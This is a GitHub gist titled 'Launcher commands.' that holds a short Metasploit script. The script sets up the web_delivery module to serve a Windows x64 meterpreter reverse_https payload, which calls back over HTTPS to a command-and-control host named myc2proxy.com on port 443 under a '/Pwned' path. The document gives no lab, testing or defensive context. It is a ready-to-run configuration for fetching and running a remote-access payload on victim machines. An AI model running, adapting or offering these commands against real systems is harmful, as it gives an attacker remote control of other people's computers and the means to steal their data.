Skip to content

Instantly share code, notes, and snippets.

@mwender
Created October 27, 2016 14:58
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save mwender/639e888d02f8fcf3b1d5ce0ca06f88ed to your computer and use it in GitHub Desktop.
Save mwender/639e888d02f8fcf3b1d5ce0ca06f88ed to your computer and use it in GitHub Desktop.
Launcher commands.
use exploit/multi/script/web_delivery
set URIPATH /E0922BB0-684B-4ED3-967E-85D08880CFD5/m/Delivery
set DisablePayloadHandler true
set SSL True
set TARGET 2
set payload windows/x64/meterpreter/reverse_https
set LHOST myc2proxy.com
set LPORT 443
set LURI /E0922BB0-684B-4ED3-967E-85D08880CFD5/m/Pwned
run -j
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment